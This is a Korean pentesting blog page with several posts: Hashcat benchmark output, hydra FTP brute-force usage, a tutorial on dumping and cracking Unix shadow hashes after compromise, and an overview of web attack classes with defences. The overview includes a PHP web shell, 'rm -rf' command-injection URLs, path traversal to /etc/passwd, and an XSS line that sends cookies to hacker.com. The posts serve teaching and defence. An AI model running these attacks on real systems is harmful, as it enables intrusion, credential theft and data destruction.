etc. benchmark mode

Hashcat의 알고리즘 별로 crack 속도 테스트를 진행하여 결과를 출력해 준다.
example) hashcat -b

MacBookPro-2 ~ % hashcat -b
hashcat (v6.2.5-532-gcd77e488d) starting in benchmark mode

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
             You have been warned.

METAL API (Metal 306.7.4)
=========================
* Device #1: Apple M1 Max, 24512/49152 MB, 24MCU

OpenCL API (OpenCL 1.2 (Apr 15 2023 03:24:33)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M1 Max, skipped

Benchmark relevant options:
===========================
* --optimized-kernel-enable

-------------------
* Hash-Mode 0 (MD5)
-------------------
Speed.#1.........:  8638.3 MH/s (92.16ms) @ Accel:1024 Loops:1024 Thr:32 Vec:1
----------------------
* Hash-Mode 100 (SHA1)
----------------------
Speed.#1.........:  3280.9 MH/s (60.35ms) @ Accel:256 Loops:1024 Thr:32 Vec:1
---------------------------
* Hash-Mode 1400 (SHA2-256)
---------------------------
Speed.#1.........:  1297.6 MH/s (76.56ms) @ Accel:1024 Loops:128 Thr:32 Vec:1
---------------------------
* Hash-Mode 1700 (SHA2-512)
---------------------------
Speed.#1.........:   326.2 MH/s (76.16ms) @ Accel:256 Loops:64 Thr:64 Vec:1

저작자표시 비영리 변경금지

'Pentesting' 카테고리의 다른 글

hydra(FTP Crack) - MacOS hydra 설치 (0)	2022.08.10
Dumping And Cracking Unix Password Hashes (0)	2015.01.05
Web Application Hacking Technique 분류 (0)	2014.09.15

hydra(FTP Crack) - MacOS hydra 설치

2022. 8. 10. 11:10

Install the App(Homebrew)

1. 터미널 실행

- Press Command+Space and type Terminal and press Enter/return key.

2. 터미널에 다음 명령어 실행

- /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

- Homebrew가 설치 될 동안 기다려야함, 만약 패스워드를 입력하라고 하는경우 사용자 패스워드를 입력하면됨

* sudo로 실행하면 안됨

3. 터미널에 다음 명령어 실행

- echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile

4. 터미널 종료 후 재시작 필요

Install hydra on Mac OSX

1. 터미널에 다음 명령어 실행

- brew install hydra

2. You can now use hydra

hydra로 FTP 크랙

ex)

hydra -t 64 -V -f -l root -P direction-changes.txt ftp://192.168.0.3:3000

hydra -V -f -l test -x 5:5:a1 ftp://192.168.0.6:3000

hydra manual

hydra -h

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
  -R   restore a previous aborted/crashed session
  -I   ignore an existing restore file (don't wait 10 seconds)
  -S   perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y   disable use of symbols in bruteforce, see above
  -r   use a non-random shuffling method for option -x
  -e nsr   try "n" null password, "s" login as pass and/or "r" reversed login
  -u   loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O   use old SSL v2 and v3
  -K   do not redo failed attempts (good for -M mass scanning)
  -q   do not print messages about connection errors
  -U   service module usage details
  -m OPT   options specific for a module, see -U output for information
  -h   more command line options (COMPLETE HELP)
  server   the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT     some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp firebird memcached mongodb ncp oracle postgres radmin2 rdp sapr3 svn smb2.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

hydra -x(password bruteforce generation) manual

hydra -x -h

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
     valid CHARSET values are: 'a' for lowercase letters,
     'A' for uppercase letters, '1' for numbers, and for all others,
     just add their real representation.
  -y     disable the use of the above letters as placeholders
Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-
   -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and 1 only

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/

'Pentesting' 카테고리의 다른 글

Hashcat 사용법 (Password Crack) (1)	2023.11.15
Dumping And Cracking Unix Password Hashes (0)	2015.01.05
Web Application Hacking Technique 분류 (0)	2014.09.15

Dumping And Cracking Unix Password Hashes

2015. 1. 5. 17:35

One of the first post exploitation activities when we have compromised a target is to obtain the passwords hashes in order to crack them offline.If we managed to crack the hashes then we might be able to escalate our privileges and to gain administrative access especially if we have cracked the administrator’s hash.In this tutorial we will see how to obtain and crack password hashes from a Unix box.

Lets say that we have exploited a vulnerability and we have gained a remote shell to our target.The next step is to see the directories and files that exist on the remote system with the command ls.

Directories of the remote system

The next step is to read the /etc/passwd file which contains all the accounts of the remote system.The next image is showing the list of the local accounts of the machine that we have compromised.Lets analyse the information that we can obtain from the first account which is root.The first field indicates the username,the field x means that the password is encrypted and it is stored on the /etc/shadow file.The number 0 means that this the userID which for root accounts is always zero and the next 0 is the groupID.Next we can see the root where we can find any extra information about the user (in this case there is no other extra information) and the last two fields /root and /bin/bash are the user home directory and the command shell.

Reading the /etc/passwd file

Now that we have the list with the accounts of the remote system we can save that list in a file for later use which it will be called passwords.txt.The next step is to obtain the passwords hashes.As we know in unix systems the password hashes are stored in the /etc/shadow location so we will run the command cat /etc/shadow in order to see them.

Reading the password hashes of the target

So we will save the hashes as well in a file called shadow.txt and we will use the famous password cracker john the ripper in order to crack those hashes.In backtrack john the ripper is located in the following path: /pentest/passwords/john.

john the ripper directory

From the above image we can see all the files that the directory john contains.In that list there is a utility called unshadow.We will run this utility in order to be able to read the shadow file before we try to crack it.So we will need to execute the command ./unshadow /root/Desktop/Cracking/passwords.txt /root/Desktop/Cracking/shadow.txt > /root/Desktop/Cracking/cracked.txt

This command will combine the two files that we have created before into a single file called cracked.txt.Now we are ready to crack those hashes with the command ./john /root/Desktop/Cracking/cracked.txt.As we can see john the ripper cracked easily those password hashes so now we have all the usernames and passwords from our target.

Cracked passwords

If we want to see the passwords that we cracked we can run the show command from john.For example ./john –show /root/Desktop/Cracking/cracked.txt

Display all passwords of the target

Now that we have all the passwords we can use them in order to connect remotely to our target.For example if our target is running an SSH server then we use that service.In this specific example we will connect under the username sys.The password for the sys account is batman as we have discovered it previously.

Connection through SSH

Conclusion

In this article we saw how to obtain and crack the password hashes of the remote system.In penetration testing engagements if we manage to crack a password hash from the target then we have a valid account which will allow us to have permanent access to the box.So obtaining and cracking the hashes it should be one of the first post exploitation activities as penetration testers.

출처 : https://pentestlab.wordpress.com/tag/john-the-ripper/

저작자표시 비영리 변경금지

'Pentesting' 카테고리의 다른 글

Hashcat 사용법 (Password Crack) (1)	2023.11.15
hydra(FTP Crack) - MacOS hydra 설치 (0)	2022.08.10
Web Application Hacking Technique 분류 (0)	2014.09.15

Web Application Hacking Technique 분류

2014. 9. 15. 16:20

1. Injecting Malicious Data

웹 어플리케이션에 조작된 데이터를 입력하여 공격.

Parameter Tampering
URL Tampering
Hidden Field Manipulation
HTTP Header Manipulation
Cookie Poisoning
Executable File Upload

2. Exploiting Unchecked Input

사용자의 입력을 체크 하지 않아서 발생하는 공격

SQL Injection
Cross-site Scripting
HTTP Response Splitting
Path Traversal
Commnad Injection

1.1 Parameter Tampering

웹 어플리케이션에서 사용하는 매개변수(Parameter)를 강제로 입력하여 어플리케이션의 의도대로 동작하지 않게 하는 공격.

[HTML code]

< script>

var form = document.Login;

id(!form.id.value){

return false;

}

< /script>

[Java code]

String strID = request.getParameter("id");

위 코드의 원래 의도는 사용자가 ID폼이 빈칸이 될 수 없도록 조건 검사를 하는 것

하지만 위 코드는HTML 파일을 PC에 따로 저장해서 저 스크립트를 빼버리는 것 만으로 의도를 빗겨나갈 수 있다.

이런 공격을 해결하기 위해서는 Java script에서 아이디 필드가 비었는지 체크하는 것이 아니고,

서버사이드에서도 id Parameter가 비어있는지 체크해야 함.

전자 상거래 초창기에는 위와 같은 사례가 많았습니다. 예를 들어 상품을 보여주는데 상품 가격을 Read-only 속성이 있는 폼에 넣고 서버 사이드에서는 해당 폼에서 값을 읽어와 사용자의 포인트를 차감하면서 상품을 배송해주었던 사례도 있으며, 이것은 폼의 Read-only 속성만을 제거하면 10원으로 100,000원 짜리 물건을 살 수 있었다는 것을 의미 함.

1.2 URL Tampering

GET방식(URL사용)으로 중요한 데이터를 보내는 경우에 이를 조작하여 공격자가 의도 하는 대로 동작을 바꾸는 것 공격 방식.

[정상적인 URL]
http://www.bank.com/myaccount?Sender=Attacker&Receiver=Attacker2&DebitAmount=1000

[공격 URL]
http://www.bank.com/myaccount?Sender=Attacker&Receiver=Attacker2&DebitAmount=-5000

정상적인 URL이 실행되면 Attacker라는 ID에서 1000 포인트를 차감하여 Attacker2라는 사용자에게 1000 포인트를 전송한다고 가정. 이때 Attacker가 위 URL을 -5000이라고 바꾸어 실행하면 내부적으로 다음과 같은 코드가 동작.

Attacker.Point -= DebitAmount;
Attacker2.Point += DebitAmount;

-5000이라는 입력은 위 코드에 들어가서 반대로 Attacker2에서 -5000을 빼고, 공격자 본인에게 +5000을 하게 될 것입니다. 이런 공격 방식 또한 대부분 인지하고 있어서 위와 같은 문제가 발생하지 않게 하고 있습니다.

방어를 위해서는, GET 방식으로 중요한 데이터를 주고 받지 말아야 함.
그 후 서버사이드로 넘어오는 모든 값을 체크 할 것.

위와 같은 코드에서는 DebitAmount에 마이너스 값이 들어오면 경고를 하고 코드가 동작하지 않도록 해야 함.

1.3 Hidden Field Manipulation

웹 페이지가 Hidden 타입을 이용하여 값을 웹 어플리케이션으로 전달하는 방법을 이용하는 공격.

웹 페이지를 로컬에 저장한 후 태그 값을 수정하여 실행하는 것 만으로도 공격이 가능.
최근에 나오는 브라우저는 브라우저에서 바로 값을 수정하여 실행시킬 수 있기 때문에 더욱 공격이 쉬워짐.

[정상적인 HTML 코드]
< input type="hidden" name="price" value="100000">

[수정한 HTML 코드]
< input ytpe="hidden" name="price" value="10">

이 공격을 방어하기 위해서는 아무리 중요하지 않은 정보라도 Hidden 태그로 처리하기 보다는
서버사이드에서 DB와 연동하여 직접 처리해야 합니다.

1.4 HTTP Header Manipulation

웹 어플리케이션이 HTTP 헤더의 정보를 이용할 때, 이를 조작하여 웹 어플리케이션이 오 동작 하도록 유인하는 공격 방식

예를 들어 A 사이트를 통해서 B 사이트로 들어오는 정보를 특별하게 처리하기 위해 HTTP Header의 Referer 필드를 이용하는 경우 충분히 조작이 가능.

[HTTP Header]

Get Shell.php

RERFERER http://trust.com

B 사이트에서 Shell.php 요청 명령을 받았을 때, 위 박스에 있는 헤더처럼 trust.com 사이트를 통해 들어온 명령이면 처리하고 그렇지 않으면 거부하는 코드가 있다고 가정했을 때, 이것은 C사이트에서 온 것처럼 Header를 변경하여 위변조 가능.

이 공격을 방어하기 위해서는 HTTP Header를 신뢰하지 않아야 함.

1.5 Cookie Poisoning

쿠키 변조 또는 쿠키 중독 공격이라고 부르며, 쿠키에 저장된 파라미터를 공격하는 파라미터 변조 공격의 일종이다. Cookie를 조작하여 원하는 결과를 도출해 낼 때 사용.

Cookie란 웹 사이트의 특정 정보를 저장하는 기법으로 사용자의 PC나 장치에 저장되며 서버에도 저장될 수 있다.

보통 Cookie에는 사용자의 정보를 많이 저장하는데 물건을 구매하거나 메일을 보낼 때 Cookie를 사용한다면 변조 함으로써 특정 계정에 대한 접근 권한을 얻거나, 또한 사용자의 쿠키를 훔쳐서 ID, PW 없이 또는 인증 없이 사용자 계정을 얻을 수 있다

[Cookie.txt]

ID=Victim SessionID=102

[Web application]

GetCookie(ID)->Point -= 100000;

GetCookie(ID)->BuyProduct("컴퓨터");

사용자의 정보를 쿠키에 저장한 후, 물건을 구매할 때 서버에서 이 정보를 불러와서 물건을 결제하는 코드.

사용자의 ID는 사용자의 PC에 있는 쿠키에 저장되어 있으므로 이 쿠키를 조작한다면 내가 원하는 사람에게 결제를 하면서 나에게 배송되게 할 수 있는 것.

이를 해결하기 위해서는 세션을 이용하고, 모든 중요한 정보는 서버사이드에서 처리, 쿠키에 중요한 정보에 대한 저장을 막거나 전송 시 암호화 한다.

1.6 Executable File Upload

웹 서버에서 실행될 수 있는 파일(PHP, JSP, ASP 등)을 업로드 하여 원하는 코드를 실행시키는 공격 방법. 웹 초기에 유행했던 공격 방식.

[Hack.php]

passthru($cmd)

만약 PHP가 동작하는 웹 사이트에 Hack.php 파일이 업로드 된다면 http://victim.com/Hack.php?cmd="rm-rf *" 와 같은 URL에 접근하여 웹 서버 내부에 침투할 수 있게 됨.

cmd에 넣는 모든 쉘 명령어를 웹 서버가 처리.

하지만 워낙 고전이라는 것에 허점이 있어서 모두가 안심하고 있을 때,

몇 년 전 Apache 서버의 버그로 이 공격이 일파만파 다시 시도.

그것은 Apache의 기능 중 접속 국가별로 다른 페이지를 보여주기 위해 .kr, .jp 와 같은 확장자를 사용하는 옵션에서,서버사이드는 끝의 확장자가 .php만 막을 뿐 이였고,아파치는 .php.kr 또한 php 파일로 처리.

2.1 SQL Injection

SQL injection 은 사용자의 입력이 back-end database에 바로 전달 되어 실행되는 취약점

[JAVA]

HttpServletRequest request = ...;

String userName = request.getParameter("name");

Connection con = ...

String query = "SELECT * FROM Users " + " WHERE name =’" + userName + "’";

con.execute(query);

[공격]

이 때 name에 'or 1==1; 를 입력한다면

쿼리는 SELECT * from USER where name=''or 1==1; 과 같이 입력하게 되면 모든 사용자에 대해 출력.

SQL Injection은 이제 서버사이드의 언어 자체에서 거르는 기능을 통해 크게 발생하고 있지는 않지만, 방어를 우회할 수 있는 많은 응용 방법이 나오고, 아직까지 가장 광범위하게 사용되고 있는 공격 방식.

방어하기 위해서는 HTML에서 입력을 받을 때 특수 문자나 여러 가지 상황을 고려해 방어하거나, 입력 받는 문자를 스트링으로 강제 변환하여 받는 방법 등으로 해결해야 할 것 입니다.

2.2 Cross-site Scripting

악의 적인 사용자가 웹 서버를 통해 다른 클라이언트의 컴퓨터에서 악의적인 코드를 실행시키는 기법.

사용자의 컴퓨터에서 자바스크립트가 실행 된다는 점을 이용한다.

이를 통해 다른 사용자의 쿠기를 자신의 메일로 전송하게 하거나, 다른 사용자에게 악성 코드를 설치하는 등 여러가지 공격을 수행.

대표 기법

- Reflected XSS : 공격 스크립트가 삽입 된 URL을 사용자가 쉽게 확인할 수 없도록 변형 시킨 후 이메일이나 다른 웹사이트 등에 올려 클릭을 유도 하도록 하는 기법

- Stored XSS : 스크립트를 웹 서버에 저장하여 사용자가 해당 페이지를 클릭하는 순간 스크립트가 실행되도록 하는 기법 (XSS 보안 처리가 안된 게시판에 공격자가 게시글에 스크립트를 삽입)

String strCookie = Document.GetCookie();

Redirect(http://www.hacker.com/SaveCookie?Data=strCookie);

< /script>

위의 박스와 같은 코드를 자바 스크립트가 동작하는 페이지에 삽입하여, 다른 사용자의 쿠키를 자신의 서버에 저장하는 방식이 있을 수 있다.

2.3 HTTP Response Splitting

웹 어플리케이션이 HTTP response가 분리될 수 있는 보안 취약점을 가지고 있다면 응답 메시지를 조작하여 Proxy 서버를 공격자의 의도대로 조작할 수 있는 공격 방식.

공격받은Proxy 서버를 사용하는 모든 사용자는 조작된 페이지를 보게 될 수 있다.

[JSP]

response.sendRedirect("/by_lang.jsp?lang="+request.getParameter("lang"));

만약JSP에서 위와 같은 코드를 사용한다면 공격자가 다음과 같은 코드를 보내서 프록시에게 응답 패킷이 두개라고 착각하게 만들 수 있습니다.

[공격 코드]

HTTP://victim.com/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a0d%0a<html>Getroot</html>

http://victim.com//index.html

서버사이드에서는 공격 코드에 있는 인자를 그대로 받아서 처리하기 때문에 foobar 이후의 코드를 그대로 응답에 사용하게 될 것. 이 때 공격자가 http://victim.com/index.html을 빠르게 요청하면 프록시 서버에서는 다음과 같이 응답이 온것으로 착각.

HTTP/1.1 302 Moved Temporarily

Date: Wed, 24 Dec 2003 15:26:41 GMT

Location: http:// victim.com /by_lang.jsp?lang=foobar

Content-Length: 0

<index.html 에 매칭>

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 19

<html>Getroot</html>

따라서 해당 프록시를 사용하는 사용자는 http://victim.com/index.html에 접근할 때 마다 Getroot 라는 조작된 페이지를 보게 될 것. 매우 많은 사용자가 사용하는 프록시 서버라면 Cross-site scripting과 결합하여 모든 URL로부터 악성코드가 감염되도록 조작할 수 있을 것입니다.

2.4 Path Traversal

웹 페이지에서 전달 받은 인자를 그대로 Path로 사용할 때, 해당 값을 조작하여 원하는 파일에 접근할 수 있게 되는 방식.

[정상적인 URL]

http://www.victim.com/OpenFile.jsp?text.txt

[공격]

http://www.victim.com/OpenFile.jsp?../../etc/passwd

정상적인 URL에서는 text.txt 와 같이 정상적인 파일에 접근하는 것으로 사용하지만, 공격자가 ../../을 사용함으로써 다른 시스템의 오픈 되지 않은 다른 디렉토리에 접근할 수 있는 여지가 발생.

공격을 방어하기 위해서는 사용자의 입력을 그대로 시스템에서 사용하지 말아야 함.

2.5 Commnad Injection

웹 어플리케이션에서 사용자의 입력을 직접적인 Shell 명령으로 이용할 때 이를 조작하여 원하는 명령을 실행할 수 있는 공격.

[ListFile.php]

Passthru(ls $path);

위와 같이 사용자에게 path라는 인자를 받아서 이를 ls 에 사용하여 원하는 디렉토리의 파일 목록을 보여주는 코드가 있다고 가정. 프로그래머는 당연히 ls 명령이므로 보안상 문제가 없을 것 이라고 예상.

다음과 같은 입력을 하여 시스템에 모든 명령을 내릴 수 있다.

[공격]

http://www.victim.com/ListFile.php?paht="/etc/;rm-rf /*"

명령어와 명령어 사이에 ;를 입력하면 두 가지 명령어가 순차적으로 수행되는 쉘 기능이 있기 때문에 위 공격 코드는 ls /etc와 rm -rf /* 명령어 두 개가 동시에 수행되는 것.

이 문제를 해결하기 위해서는 사용자의 입력을 그대로 쉘 명령으로 수행 금지.

어떤 상황에서도 모든 사용자의 입력은 한번 가공해서 처리해야 한다.

저작자표시

'Pentesting' 카테고리의 다른 글

Hashcat 사용법 (Password Crack) (1)	2023.11.15
hydra(FTP Crack) - MacOS hydra 설치 (0)	2022.08.10
Dumping And Cracking Unix Password Hashes (0)	2015.01.05

Belie

“The only thing standing between you and your goal is the bullshit story
you keep telling yourself as to why you can't achieve it.”

Pentesting

Hashcat 사용법 (Password Crack)

Hashcat은,

Hashcat 사용법

1. Attack mode

1-1. Built-in Charsets

2. Hash modes

3. Device Types

4. Workload Profiles

5. Optimized-kernel-enable

6. 사용 예시.

etc. tip?

etc. benchmark mode

'Pentesting' 카테고리의 다른 글

hydra(FTP Crack) - MacOS hydra 설치

'Pentesting' 카테고리의 다른 글

Dumping And Cracking Unix Password Hashes

'Pentesting' 카테고리의 다른 글

Web Application Hacking Technique 분류

'Pentesting' 카테고리의 다른 글

티스토리툴바

Belie

“The only thing standing between you and your goal is the bullshit storyyou keep telling yourself as to why you can't achieve it.”

Pentesting

Hashcat 사용법 (Password Crack)

Hashcat은,

Hashcat 사용법

1. Attack mode

1-1. Built-in Charsets

2. Hash modes

3. Device Types

4. Workload Profiles

5. Optimized-kernel-enable

6. 사용 예시.

etc. tip?

etc. benchmark mode

'Pentesting' 카테고리의 다른 글

hydra(FTP Crack) - MacOS hydra 설치

'Pentesting' 카테고리의 다른 글

Dumping And Cracking Unix Password Hashes

'Pentesting' 카테고리의 다른 글

Web Application Hacking Technique 분류

'Pentesting' 카테고리의 다른 글

티스토리툴바

“The only thing standing between you and your goal is the bullshit story
you keep telling yourself as to why you can't achieve it.”